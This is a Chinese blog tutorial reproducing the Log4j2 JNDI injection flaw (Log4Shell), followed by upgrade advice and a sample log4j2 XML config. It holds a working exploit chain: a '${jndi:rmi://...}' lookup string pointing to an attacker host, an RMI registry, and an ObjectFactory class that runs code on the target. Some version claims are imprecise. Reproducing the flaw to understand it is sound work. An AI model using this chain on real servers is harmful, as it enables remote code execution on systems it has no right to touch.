log4j2 2.14.0之前的版本出现重大漏洞

最新推荐文章于 2024-07-20 07:00:00 发布
最新推荐文章于 2024-07-20 07:00:00 发布
阅读量1.7k 收藏 1
点赞数
文章标签: java maven jar log4j2 bug
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Syjavascript/article/details/121876063
版权
本文介绍了Log4j2中关于lookup功能存在的JNDI注入漏洞,黑客可通过该漏洞执行远程代码。示例代码展示了如何利用此漏洞以及简单的防御措施。解决方案包括升级到log4j2的2.15.0版本或更换日志框架。强调了参数校验和安全意识的重要性。
摘要由CSDN通过智能技术生成

log4j2 2.14.0之前的版本出现重大漏洞

长话短说

lookup

这个是log4j2的一个功能,就是说你可以用

String javaCmd = "${java:os}";
LOGGER.info("javacmd: {}", javaCmd);

这种方式来打印系统的一些相关信息
在这里插入图片描述

而这种lookup好像是基于jndi,rmi,具体这两个东西是啥,请去google一下, 这里就不多说了。

jndi注入

这个也是一种大课题了,我前几天才知道有这个东西
直接上代码

环境介绍(最基本的maven项目)

  • jdk1.8.0-291
  • log4j2 2.14.0

    • 注意log4j和log4j2还不一样,这两个虽然是同一作者,但是log4j是通过porperties配置了,log4j2可以通过xml配置

    • maven 3.6.3
    • idea 2021.1.2
      主要是jdk版本和log4j2的版本
你的controller可能是这样写的
package com.syj.controller;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * lookup是基于jndi的jndi又基于rmi所以下面这个特殊命令就会出问题
 *
 * @author 儒雅随和的施兄
 * @date 2021/12/11 15:18
 */
public class UserController {

    private static final Logger LOGGER = LogManager.getLogger(UserController.class);

    public static void main(String[] args) {
        String bug = "${jndi:rmi://192.168.31.11:1099/evil}";

        //tring username = "syj";
        String javaCmd = "${java:os}";

        //Key Description
        //version The short Java version, like:Java version 1.7.0_67
        //runtime The Java runtime version, like:Java(TM) SE Runtime Environment (build 1.7.0_67-b01) from Oracle Corporation
        //vm The Java VM version, like:Java HotSpot(TM) 64-Bit Server VM (build 24.65-b04, mixed mode)
        //osThe OS version, like:Windows 7 6.1 Service Pack 1, architecture: amd64-64
        //locale Hardware information, like:default locale: en_US, platform encoding: Cp1252
        //hw Hardware information, like:processors: 4, architecture: amd64-64, instruction sets: amd64
        LOGGER.info("username: {}", javaCmd);
    }
}
黑客的代码可能是这样写的
package com.syj.rmi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * @author 儒雅随和的施兄
 * @date 2021/12/11 16:00
 */
public class RMIServer {
    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();

            System.out.println("Create RMI register on port 1099");

            Reference reference = new Reference("com.syj.rmi.Hacker","com.syj.rmi.Hacker",null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("evil",referenceWrapper);

        } catch (RemoteException | NamingException | AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}


package com.syj.rmi;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;
import java.util.concurrent.LinkedBlockingQueue;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;

/**
 * @author 儒雅随和的施兄
 * @date 2021/12/11 16:02
 */
public class Hacker implements ObjectFactory {
    static {
        System.out.println("bangbangbang你被攻击了");
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        int core = Runtime.getRuntime().availableProcessors();
        ThreadPoolExecutor threadPoolExecutor = new ThreadPoolExecutor(core, core * 2, 5, TimeUnit.SECONDS, new LinkedBlockingQueue<>(), new ThreadFactory() {
            @Override
            public Thread newThread(Runnable r) {
                return new Thread(r);
            }
        });
        threadPoolExecutor.execute(()->{
            while (true){
                try {
                    TimeUnit.SECONDS.sleep(1);
                    System.out.println("连续攻击");
                } catch (InterruptedException e) {
                    e.printStackTrace();
                }
            }
        });
        return null;
    }
}

在这里插入图片描述

解释部分

  • UserController

    这个类模拟的是你的controller层代码,你会接收一个参数,然后对他做处理,然后不知道是哪里的原因,日志记录了前端的参数

  • RMIServer

    这个类你可以把它理解为一个rmi的注册中心,具体的原理太复杂了,我也不懂,baidu去吧

  • Hacker

    这个类就是黑客具体的业务类要实现ObjectFactory,其实这个是一个Obj的工厂类,在这个代码种工厂和产品都是一个东西了,做的比较简单,反正目的是达到了,已经能在对方的服务器里面做一些手脚了

UserController是服务器上的代码,RMIServer和Hacker是黑客电脑上的代码,jndi注入可以达到在服务器上调用远程服务,懂RPC的你就把他理解为RPC吧。

总结

昨天的漏洞,紧急bug,头一次感觉阿帕奇离自己如此的近,今天也是查找资料,把这个漏洞有可能出现的bug复现了一下,这个我觉得是一个参数问题,如果前后端不校验参数的话,就很危险,有可能就有恶意str跑到服务器上,即使不会有重大损失,冗余是一定会有的,所以一定要做参数处理。如果是框架内部的日志记录的恶意参数,那我们就干涉不聊了。。。。。。

解决方法

log4j2 的新版本已经解决这个问题了(2.15.0)
或者用别的日志代替log4j2

<?xml version="1.0" encoding="UTF-8"?>
<!--日志级别以及优先级排序: OFF > FATAL > ERROR > WARN > INFO > DEBUG > TRACE > ALL -->
<!--Configuration后面的status,这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,你会看到log4j2内部各种详细输出-->
<!--monitorInterval:Log4j能够自动检测修改配置 文件和重新配置本身,设置间隔秒数-->
<configuration status="WARN" monitorInterval="30">
    <!--先定义所有的appender-->
    <appenders>
        <!--这个输出控制台的配置-->
        <console name="Console" target="SYSTEM_OUT">
            <!--输出日志的格式-->
            <PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
        </console>
        <!--文件会打印出所有信息,这个log每次运行程序会自动清空,由append属性决定,这个也挺有用的,适合临时测试用-->
        <File name="fileLog" fileName="log/log4j2.log" append="false">
            <PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %class{36} %L %M - %msg%xEx%n"/>
        </File>
        <!-- 这个会打印出所有的info及以下级别的信息,每次大小超过size,则这size大小的日志会自动存入按年份-月份建立的文件夹下面并进行压缩,作为存档-->
        <RollingFile name="RollingFileInfo" fileName="${sys:user.home}/logs/info.log"
                     filePattern="${sys:user.home}/logs/$${date:yyyy-MM}/info-%d{yyyy-MM-dd}-%i.log">
            <!--控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch)-->
            <ThresholdFilter level="info" onMatch="ACCEPT" onMismatch="DENY"/>
            <PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
            <Policies>
                <TimeBasedTriggeringPolicy/>
                <SizeBasedTriggeringPolicy size="100 MB"/>
            </Policies>
        </RollingFile>
        <RollingFile name="RollingFileWarn" fileName="${sys:user.home}/logs/warn.log"
                     filePattern="${sys:user.home}/logs/$${date:yyyy-MM}/warn-%d{yyyy-MM-dd}-%i.log">
            <ThresholdFilter level="warn" onMatch="ACCEPT" onMismatch="DENY"/>
            <PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
            <Policies>
                <TimeBasedTriggeringPolicy/>
                <SizeBasedTriggeringPolicy size="100 MB"/>
            </Policies>
            <!-- DefaultRolloverStrategy属性如不设置,则默认为最多同一文件夹下7个文件,这里设置了20 -->
            <DefaultRolloverStrategy max="20"/>
        </RollingFile>
        <RollingFile name="RollingFileError" fileName="${sys:user.home}/logs/error.log"
                     filePattern="${sys:user.home}/logs/$${date:yyyy-MM}/error-%d{yyyy-MM-dd}-%i.log">
            <ThresholdFilter level="error" onMatch="ACCEPT" onMismatch="DENY"/>
            <PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
            <Policies>
                <TimeBasedTriggeringPolicy/>
                <SizeBasedTriggeringPolicy size="100 MB"/>
            </Policies>
        </RollingFile>
    </appenders>
    然后定义logger,只有定义了logger并引入的appender,appender才会生效
    <loggers>
        <!--过滤掉spring和mybatis的一些无用的DEBUG信息-->
<!--        <logger name="org.springframework" level="INFO"></logger>-->
<!--        <logger name="org.mybatis" level="INFO"></logger>-->
        <root level="all">
            <appender-ref ref="Console"/>
            <appender-ref ref="fileLog"/>
            <appender-ref ref="RollingFileInfo"/>
            <appender-ref ref="RollingFileWarn"/>
            <appender-ref ref="RollingFileError"/>
        </root>
    </loggers>
</configuration>
Syjavascript
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2689
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
apache-log4j-2.14.0-bin.zip
03-01
在2021年,Log4j 2曾发现一个严重漏洞(CVE-2021-44228),该漏洞允许远程代码执行。因此,保持Log4j到最新版本至关重要,以确保应用免受潜在的安全威胁。 总的来说,Apache Log4j 2.14.0是一个强大的日志工具,它...
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 8814
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Log4j2原理及应用详解(十一)
最新发布
凛鼕将至的博客
07-20 975
随着Logback的兴起,Log4j开始式微。为了应对这一挑战,Apache软件基金会决定开发Log4j的继任者——Log4j2Log4j2不仅改进了Log4j的缺点,还借鉴了Logback的许多优点,号称在性能上完胜Logback。 本文将跟随《Log4j2原理及应用详解(十)》的进度,继续介绍Log4j2。希望通过本系列文章的学习,您将能够更好地理解Log4j2的内部工作原理,掌握Log4j2的使用技巧,以及通过合理的设计完成最佳实践,充分发挥优化Log4j2的潜力,为系统的高效运
升级log4J2版本的问题和解决思路
Seeker-Wu的专栏
01-28 8277
因为新版本log4j2日志性能更好,所以我们采用新版本的日志打印来提高系统性能,那么如何替换新版本的日志打印,下面是步骤: 步骤1: 修改log4j版本的依赖。 &lt;log4j.version&gt;2.10.0&lt;/log4j.version&gt; pom中添加依赖: &lt;!-- log start --&gt; &lt;dependency&gt;     &l...
Log4j2中2.16.0版漏洞(CVE-2021-45105)原理、复现步骤和修复方法(2.17.0修复原理)
跳小闹成长记
12-22 5825
好不容易2.16.0发布之后,Log4j2官方,又突然发布了2.17.0版本,原因想必大家通过各种号推送都已经知道了。因为在2.16.0版本上发现了一个新的漏洞,该漏洞可能会导致DoS(Denial of Service)攻击。那这个漏洞到底是怎么回事呢?它会有哪些影响呢?今天咱们就一起来深度学习下该漏洞相关原理和攻击步骤。
“核弹级” Log4j 漏洞仍普遍存在,并造成持续影响
程序猿DD
07-25 166
出品:OSCHINA,编辑:白开水不加糖来源:https://www.oschina.net/news/203874/log4j-the-pain-just-keeps-going-and-goingLog4j “核弹级” 漏洞 Log4Shell 或许将永远影响世界。美国国土安全部 (DHS) 网络安全审查委员会 (CSRB) 近日发布了针对去年Log4Shell漏洞...
apache-log4j-2.14.0.rar
03-17
Log4j 2.x是对早期Log4j 1.x的重大升级,引入了许多新特性,优化了性能,并修复了安全问题。 1. **Log4j的组件** - **Core组件**: 包含基础的日志记录功能,如`Logger`, `Appender`, `Layout`, 和 `Filter`等。`...
log4j-to-slf4j-2.14.0.jar
05-28
Log4j 2 API和SLF4J之间的Apache Log4j绑定。 org.apache.logging.log4j/log4j-to-slf4j/2.14.0/log4j-to-slf4j-2.14.0.jar
log4j-1.2-api-2.14.0.jar
05-28
Apache Log4j 1.x兼容性API org.apache.logging.log4j/log4j-1.2-api/2.14.0/log4j-1.2-api-2.14.0.jar
log4j-web-2.14.0.jar
04-21
log4j-web.jar 各个版本,免费下载 如果不能免费下载,关注我,评论区联系我索要!
log4j各个版本
03-16
Log4jjar 有1.2.6 1.2.8 1.2.12 1.2.15
log4j JNDI漏洞CVE-2021-44228 针对于不同版本的解决方案
smlie_shuihan的博客
12-12 4558
问题描述: Apache Log4j 2存在远程代码执行漏洞,攻击者可通过构造恶意请求利用该漏洞实现在目标服务器上执行任意代码 漏洞影响版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 看一下目前log4jmaven官方仓库版本,几乎是主流常用版本都受影响 解决方案: 试了一下网上几种方案,绝大部分都是解决 >=2.10 版本的方案 : 1、第一种方案,更新log4j版本 https://github.com/apache/logging-log
log4j漏洞
fulong0406的博客
01-04 573
最新消息!根据Log4j官网发布,2.17.0版本还存在漏洞! 上图来自Log4j2官网:Log4j – Apache Log4j 2 漏洞编号:CVE-2021-44832 漏洞内容:Log4j2提供的JDBCAppender功能,将日志信息写入数据库中,这个过程需要JNDI的支持,故攻击者可以利用此来执行任意代码。 危害等级:中 影响范围:2.17.0及以下版本(不包含2.12.4、2.3.2) 修复措施:升级Log4j2版本 Java 8或之后用户升级到最新的2.17.1 Jav
解决Apache Log4j版本漏洞版本升级)
qq_45752401的博客
12-14 4695
近日,Apache Log4j2 的远程代码执行漏洞刷爆网络,该漏洞一旦被攻击者利用会造成严重危害。而且此次漏洞影响巨大,Apache Log4j2可是全民级的日志组件,百分之九十的项目,都是通过log4j2输出日志的,甚至BAT大厂也是如此,很多互联网企业也都连夜做了应急措施 本次以IDEA为例 1,在idea右侧找maven,如果没有,可以点击最上方的菜单栏的view -->Tool Windows --> maven ...
Log4j2注入漏洞(CVE-2021-44228)
2301_80115097的博客
10-10 64
最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。
漏洞复现】log4j2 CVE-2021-44228
zg_111的博客
03-20 2545
漏洞复现】log4j2 CVE-2021-44228漏洞复现
log4j日志漏洞问题
feinifi的博客
11-16 4064
log4j远程漏洞复现以及对这个漏洞问题的看法。
关于 Log4j 高危漏洞,有必要优先关注 Elastic 官方的综合研判......
铭毅天下Elasticsearch
12-12 5681
信息来源:https://discuss.elastic.co/铭毅一句话概括:Kibana、Beats 不受任何影响。Elasticsearch、Logstash 受到漏洞影响,需要紧急...
tensorflow2.14.0版本安装
12-13
2. 下载TensorFlow 2.14.0版本的whl文件。 3. 打开终端,切换到whl文件所在的路径。 4. 执行以下命令安装TensorFlow: ```shell pip install whl文件名 ``` 5. 等待安装完成后,可以在Python中导入TensorFlow并验证...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值